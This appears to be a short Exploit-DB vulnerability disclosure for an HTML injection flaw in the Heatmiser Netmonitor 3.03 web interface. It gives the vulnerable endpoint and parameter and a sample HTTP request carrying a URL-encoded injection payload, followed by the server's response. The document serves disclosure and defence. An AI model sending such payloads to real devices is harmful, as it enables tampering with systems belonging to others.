Exploit Title: Heatmiser Netmonitor 3.03 - HTML Injection Edb-ID: 47828 CVE: N/A Author: Ismail Tasdelen Type: WebApps Platform: Hardware Date: 2019-12-30 Vulnerable App: Netmonitor v3.03 Vulnerability Description Heatmiser Net Monitor v3.03 allows HTML Injection via the outputSetup.htm outputtitle parameter. The HTML Injection vulnerability was discovered in v3.03 version of Net Monitor. Technical Details Vendor Homepage: https://www.heatmiser.com/en/ Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf Vulnerability Type: Code Injection Vulnerability: HTML Injection Request Details Content-Type: application/x-www-form-urlencoded Content-Length: 95 Origin: http://XXX.XXX.XXX.XXX Referer: http://TARGET/outputSetup.htm Upgrade-Insecure-Requests: 1 outputtitle: %22%3E%3Cmarquee%3ETEST%23undefined%23undefined%23undefined%23undefined%23undefined HTTP Response HTTP/1.1: 200 OK Date: Sun, 22 Dec 2019 20:25:22 GMT Server: Z-World Rabbit Content-Type: text/html